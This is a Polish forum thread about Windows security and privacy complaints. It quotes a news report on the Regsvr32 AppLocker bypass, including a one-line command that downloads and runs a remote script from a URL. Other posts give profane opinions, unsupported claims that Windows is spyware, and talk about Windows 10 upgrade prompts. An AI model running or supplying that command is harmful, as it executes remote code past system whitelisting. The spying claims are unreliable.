Windows - nie_bezpieczeństwo

[kootas]

Dawno temu słyszałem, że dzięki windowsowi można przeglądać pliki w internecie, i vice versa. Internet może czytać pliki w windows.

Nowa, tym razem, Czarna Dziura w windows, od serii 7.

 

Cytat

 

Regsvr32 uruchamia skrypty z Sieci. Jedną komendą złamiesz Windows

Być może to nie błąd, lecz po prostu niezamierzona funkcjonalność Windowsa. Na pewno jednak odkryte przez Caseya Smitha działanie systemowego narzędzia Regsvr32, przeznaczonego do rejestrowania plików DLL w Rejestrze wzbudzi spore zainteresowanie zarówno wśród cyberprzestępców, jak i np. uczniów w szkołach. Któż się spodziewał, że pozwoli ono całkowicie obejść systemowe zabezpieczenia i uruchamiać w Windowsie dowolne skrypty?

AppLocker wykorzystywany jest już od czasów wprowadzenia na rynek Windowsa 7 do blokowania użytkownikom dostępu do niepożądanych skryptów i aplikacji – i do tej pory był skutecznym sposobem na zamknięcie „okienek”. Okazuje się jednak, że Regsvr32 (Microsoft Register Server), będący podpisaną przez Microsoft binarką, domyślnie obecną w systemie, pozwala na pobranie z Sieci i uruchomienie dowolnego kodu w JavaScripcie lub VBScripcie i jego uruchomienie. Kod ten zaś może uruchomić dowolną aplikację w systemie, omijając wszelkie zabezpieczenia Windowsa.

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

 

 

http://www.dobreprogramy.pl/Regsvr32-uruchamia-skrypty-z-Sieci.-Jedna-komenda-zlamiesz-Windowsa,News,72519.html

[SledgeHammer]

Miałem na próbę Viste i 7 (seven spy).

Nie potrzebowałem "fachowca" aby stwierdzic jak niebezpieczny i dziurawy jest jeden i drugi.

O 8 i 10 nie wspomnę.

Dlatego wróciłem do XP (najlepszy jak na macrospy) i linuxa.

Zawsze trudniej jest sie wpie..........c, choć trojana juz mam, ale udaje, że nie wiem, że mam.

Taka zabawa ze "służbami specjalnej troski" - za dobrze sie bawię.

Jak im będę go ciągle wykasowywał, to jeszcze wymyślą lepszy i go nie znajdę

SH.

 

Właśnie doczytałem nt. tego "konia trojańskiego" MacroSpy'a.

Fortuna Gates'a nie wzięła sie tylko ze sprzedaży softu.

 

Wyobraźcie sobie jakie i ile dziur ma ósemka i dziesiątka.

 

Cytat:

"Znany ekspert od systemów Microsoftu Alex Ionescu zachwyca się odkryciem. To w końcu wbudowane w system zdalne uruchamianie kodu bez uprawnień administratora, które omija mechanizm białych list, nie pozostawia śladów na dysku, nie dotyka Rejestru i można to wszystko w dodatku schować w zaszyfrowanej sesji HTTPS. Jak do tej pory łatek nie ma. Jedyne co pozostaje administratorom, to zablokować dostęp do Sieci dla regsvr32 na poziomie zapory sieciowej."

SH.

[kootas]

Kolejna LIPA od MS.

Wyskakuje okienko o zgodzie aktualizacji systemu.

Zamykasz okinko, co dla aplikacji oznacza, zgodę na aktualizację.

Żart, a 1-szy kwietnia już minął.:
 

Cytat

 

Okno zachęcające do aktualizacji do Windows 10 nadal wymuszać będzie zgodę użytkowników.

Windows 10: Microsoft dalej zamierza oszukiwać przy aktualizacji

 

http://www.chip.pl/news/oprogramowanie/systemy-operacyjne/2016/05/windows-10-microsoft-dalej-zamierza-oszukiwac-przy-aktualizacji

[Tamten Pan]

Strasznie mnie wkurwia to że win 8.1 codziennie truje mi dupę o aktualizacji do 10, a wiele złego słyszałem o 10. Nie wiem, co począć.

Chociaż skoro windows10 szpieguje, to 8.1 pewnie też i chuj nam wszystkim w dupę. brave new world!

 

Linux mnie wkurwia, jest brzydki jak noc i nieintuicyjny, poza tym edycja tekstu na tych gównianych open office i innym syfie to skandal, a ja potrzebuję prawilnego Worda i Excela. Chyba że emulować Windowsa na Linuxie, nie wiem czy to jest jakieś bezpieczne..

 

[von.hayek]

Jak wyłączyć szpiegowanie w Win10:

https://fix10.isleaked.com/

[Eredin]

Cytat

 

Strasznie mnie wkurwia to że win 8.1 codziennie truje mi dupę o aktualizacji do 10, a wiele złego słyszałem o 10. Nie wiem, co począć.

 

Ponoć za kilka dni ma się to skończyć. Nie będzie już darmowej aktualizacji, ale też nie będzie tych namolnych komunikatów. 

[aras]

też używam xp i linuxa, a 10 jest udana.